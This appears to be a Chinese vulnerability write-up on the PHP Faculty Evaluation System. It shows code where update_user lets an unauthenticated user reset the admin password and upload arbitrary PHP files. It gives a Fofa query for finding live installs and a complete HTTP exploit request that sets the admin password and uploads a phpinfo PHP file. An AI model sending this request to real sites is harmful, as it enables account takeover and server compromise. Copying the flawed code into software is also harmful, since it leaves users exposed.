0x00 前言

Fofa: "assets/dist/css/jquery.datetimepicker.min.css"

源码下载 : https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

这是一套面板系统，看了代码之后只能说一言难尽.....     界面长这样

0x01 前台任意重置管理员密码+文件上传漏洞

我们先看这个 ajax.php 里边调用了 update_user 方法

<?php
ob_start();
date_default_timezone_set("Asia/Manila");
$action = $_GET['action'];            //Get请求action
include 'admin_class.php';            //引用admin_class.php
$crud = new Action();
//省略其他无用代码......
...
if($action == 'update_user'){
$save = $crud->update_user();
if($save)
echo $save;
...

追到 admin_class.php ,我们来看看 update_user ,看到里边直接更新了管理员的信息，顺带上传了文件，鉴权跟不存在一样...

function update_user(){
extract($_POST);
$data = "";
$type = array("","users","faculty_list","student_list");
foreach($_POST as $k => $v){
if(!in_array($k, array('id','cpass','table','password')) && !is_numeric($k)){

if(empty($data)){
$data .= " $k='$v' ";
}else{
$data .= ", $k='$v' ";
}
}
}
$check = $this->db->query("SELECT * FROM {$type[$_SESSION['login_type']]} where email ='$email' ".(!empty($id) ? " and id != {$id} " : ''))->num_rows;
if($check > 0){
return 2;
exit;
}
if(isset($_FILES['img']) && $_FILES['img']['tmp_name'] != ''){
$fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
$move = move_uploaded_file($_FILES['img']['tmp_name'],'assets/uploads/'. $fname);
$data .= ", avatar = '$fname' ";

}
if(!empty($password))
$data .= " ,password=md5('$password') ";
if(empty($id)){
$save = $this->db->query("INSERT INTO {$type[$_SESSION['login_type']]} set $data");
}else{
echo "UPDATE {$type[$_SESSION['login_type']]} set $data where id = $id";
$save = $this->db->query("UPDATE {$type[$_SESSION['login_type']]} set $data where id = $id");
}

if($save){
foreach ($_POST as $key => $value) {
if($key != 'password' && !is_numeric($key))
$_SESSION['login_'.$key] = $value;
}
if(isset($_FILES['img']) && !empty($_FILES['img']['tmp_name']))
$_SESSION['login_avatar'] = $fname;
return 1;
}
}

如果成功就会 return 1 中间还有一串检测邮箱的代码，但问题不大:

$check = $this->db->query("SELECT * FROM {$type[$_SESSION['login_type']]} where email ='$email' ".(!empty($id) ? " and id != {$id} " : ''))->num_rows;

Payload:

POST /eval/ajax.php?action=update_user HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://x.x.x.x/eval/index.php?page=report
Content-Length: 737
Content-Type: multipart/form-data; boundary=---------------------------166782539326470
Connection: close

-----------------------------166782539326470
Content-Disposition: form-data; name="id"

1
-----------------------------166782539326470
Content-Disposition: form-data; name="firstname"

Administrator
-----------------------------166782539326470
Content-Disposition: form-data; name="lastname"

a
-----------------------------166782539326470
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------166782539326470
Content-Disposition: form-data; name="password"

admin
-----------------------------166782539326470
Content-Disposition: form-data; name="img"; filename="php.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------166782539326470--

没有显示上传路径咋办?  直接登录后台看 [email protected]|admin 因为密码已经被修改了...

文件实际上传在这: /assets/uploads/时间戳_filename.php

免责声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，文章作者和本公众号不承担任何法律及连带责任，望周知！！！